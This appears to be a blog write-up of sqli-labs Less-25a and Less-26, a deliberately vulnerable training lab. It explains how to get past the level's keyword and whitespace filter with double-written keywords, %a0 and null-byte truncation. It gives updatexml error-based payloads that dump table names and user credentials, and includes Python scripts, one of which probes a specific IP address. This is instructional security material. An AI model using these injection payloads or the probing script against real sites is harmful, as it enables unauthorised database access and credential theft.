sqlilabs(25a-26)
2022-04-22 04:10:00 [cyphersec]
Less-25a
Filters or and and.
The only difference from Less-25 is that $id is no longer wrapped in single quotes (it is used bare, as a number); everything else is the same.
Less-26
Under Apache, Less-26 runs into the problem that the whitespace substitutes cannot be used, so we solve this level in Docker instead.
Start the container first:
docker images
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs
ifconfig   # to find the host address to point the browser at
Once the container is up, reset the database from the sqli-labs index page before starting the level.
Reading the source shows that a lot is filtered, all of it with regular expressions (preg_replace):
or, and, /*, --, #, whitespace, and every slash and backslash.
So the usual comment sequences are stripped.
One way round that is to end the query with ;%00 (null-byte truncation) instead of a comment.
%23 is only the URL-encoded form of #: PHP decodes it before the blacklist runs, so it is stripped as well and does not help here.
Another option is to close the quote with or '1'='1 (remembering that or is filtered in this level too).
Write or as || instead, or double it: oorr comes out as or because each pattern is applied only once. and is handled the same way (&&, or anandd).
Spaces are filtered as well. The substitutes one normally reaches for are:
/**/
()
newline (%0a in the URL)
backtick (the key above Tab)
tab
two spaces (double-writing)
In Less-26, however, the [\s] pattern strips every whitespace character, so newline, tab and repeated spaces are all removed, and with / and * stripped /**/ disappears too. What survives here is wrapping terms in parentheses, as the payloads below do, or a byte the pattern does not treat as whitespace, such as %a0.
With error-based injection the space problem largely goes away, because the whole query can be written as nested function calls.
The payloads:
?id=1' || updatexml(1,concat(0x7e,(database()),0x7e),1) || '1'='1
?id=1' || updatexml(1,concat(0x7e,(database()),0x7e),1) ;%00

Bypass successful.
Next, list the tables in the security database:
?id=1' || updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables) where (table_schema=0x7365637572697479)),0x7e),1) || '1'='1
XPATH syntax error: 'emails,referers,uagents,users'
Even with group_concat the output can be incomplete: updatexml only returns the first 32 characters of the error string, so it is better to fetch values one at a time (with limit, or with a where clause on id as below).
?id=1' || updatexml(1,concat(0x7e,(database())),1) || '1'='1
?id=1' || updatexml(1,concat(0x7e,(select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = 0x7365637572697479))),1) ||'1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = 0x7573657273))),1) || '1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users))),1) || '1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) where (id=2))),1) || '1'='1
# Change the id value to walk through every row.
When %a0 is used as the space substitute:
?id=1' %a0%a0%a0%a0 oorrder %a0by%a0;%00   # %a0 stands for a space here
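The filter rules, the double-written payloads and the %a0 substitute above can be checked offline. The block below is an added example, not code from the post: it reconstructs the Less-26 blacklist in Python from the description above (the pattern order and the single-pass preg_replace behaviour are assumptions, matched to what the double-write bypass requires), builds the post's updatexml payloads from plain SQL, and tests which URL-encoded separators come through the filter intact. The table, column and row subqueries are constructed from the post's own examples; the helper names (blacklist, double_write, error_payload, separator_survives) belong to this example, not to sqli-labs.

```python
import re
from urllib.parse import unquote_to_bytes

# Reconstruction (assumed) of the Less-26 blacklist: one non-recursive
# preg_replace per pattern, in this order. Working on bytes keeps \s at
# ASCII whitespace, which is what PCRE does without the /u modifier, so a
# 0xA0 byte is left alone here just as it is on the PHP side.
BLACKLIST = [
    rb"or",        # strips OR, case-insensitive
    rb"and",       # strips AND
    rb"[/*]",      # strips /*
    rb"-",         # strips --
    rb"#",         # strips #
    rb"\s",        # strips space, \t, \n, \r, \f, \v (\v depends on the PCRE version)
    rb"[/\\]",     # strips / and \
]


def blacklist(decoded_id: bytes) -> bytes:
    """Apply the filter to the id parameter after PHP's URL decoding."""
    for pattern in BLACKLIST:
        decoded_id = re.sub(pattern, b"", decoded_id, flags=re.IGNORECASE)
    return decoded_id


def filtered(url_encoded_id: bytes) -> bytes:
    """What MySQL ends up seeing for a given ?id= value."""
    return blacklist(unquote_to_bytes(url_encoded_id))


def double_write(sql: str) -> str:
    """Double-write the filtered keywords: the single pass turns oorr back into
    or and anandd back into and, so information_schema, password and order survive."""
    return sql.replace("or", "oorr").replace("and", "anandd")


def hexlit(s: str) -> str:
    """String as a MySQL hex literal, avoiding quotes (0x7365637572697479 = 'security')."""
    return "0x" + s.encode().hex()


def error_payload(expr: str) -> str:
    """Wrap a space-free MySQL expression in the updatexml error channel the post uses."""
    return f"1'||updatexml(1,concat(0x7e,({double_write(expr)})),1)||'1'='1"


def restored(expr: str) -> bool:
    """True when the filter turns the double-written payload into the intended SQL."""
    intended = f"1'||updatexml(1,concat(0x7e,({expr})),1)||'1'='1".encode()
    return filtered(error_payload(expr).encode()) == intended


def separator_survives(encoded: bytes) -> bool:
    """Does the URL-encoded separator still sit between 'order' and 'by' after
    the filter? This tests the filter only; whether MySQL then accepts the byte
    as whitespace is what the post's scanning script checks against the server."""
    decoded = unquote_to_bytes(encoded)
    probe = b"1'" + encoded + b"oorrder" + encoded + b"by" + encoded + b"3"
    return filtered(probe) == b"1'" + decoded + b"order" + decoded + b"by" + decoded + b"3"


# Constructed subqueries following the post's enumeration steps.
TABLES_EXPR = ("select(group_concat(table_name))from(information_schema.tables)"
               f"where(table_schema={hexlit('security')})")
COLUMNS_EXPR = ("select(group_concat(column_name))from(information_schema.columns)"
                f"where(table_name={hexlit('users')})")


def row_expr(row_id: int) -> str:
    """One users row per request, which sidesteps updatexml's 32-character limit."""
    return f"select(concat_ws(0x7e,username,password))from(security.users)where(id={row_id})"


if __name__ == "__main__":
    for expr in (TABLES_EXPR, COLUMNS_EXPR, row_expr(2)):
        print(error_payload(expr), "->", filtered(error_payload(expr).encode()).decode())
    for sep in (b"%20", b"%0a", b"/**/", b"%a0"):
        print(sep, "survives the filter:", separator_survives(sep))
```

Running it prints each double-written payload next to the SQL the filter hands to MySQL, and shows that %20, %0a and /**/ are all collapsed while %a0 passes through untouched; whether the database treats that byte as whitespace still has to be confirmed against the live target, which is what the scanning script further down does.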
The following script checks which URL-encoded bytes are accepted as a space replacement.
Reference: the HTML URL encoding table at https://www.w3school.com.cn/tags/html_ref_urlencode.html
The script:
# -*- encoding: utf-8 -*-
import requests

# Try every single-byte value as the separator between 1' and && and see
# whether the row for id=1 ("Dumb") still comes back.
for i in range(0, 256):
    code = hex(i).replace('0x', '')
    if len(code) < 2:
        code = "0" + code
    code_0x = "%" + code
    # Sends 1'<byte>&&<byte>'1'='1  (%26%26 is && URL-encoded so it is not
    # parsed as a parameter separator). Note that '1'&&'1'='1' is valid SQL
    # with no separator at all, so bytes the filter strips outright (plain
    # whitespace) are reported too; confirm candidates with a payload that
    # needs real whitespace, such as oorrder<byte>by<byte>3.
    url = "http://121.199.30.46/Less-26/?id=1'" + code_0x + "%26%26" + code_0x + "'1'='1"
    r = requests.get(url=url)
    if "Dumb" in r.content.decode("utf-8", "ignore"):
        print(code_0x)
Copyright notice
This article was written by [cyphersec]; please include the original link when reposting. Thanks.
https://blog.csdn.net/cuddlylm/article/details/124333641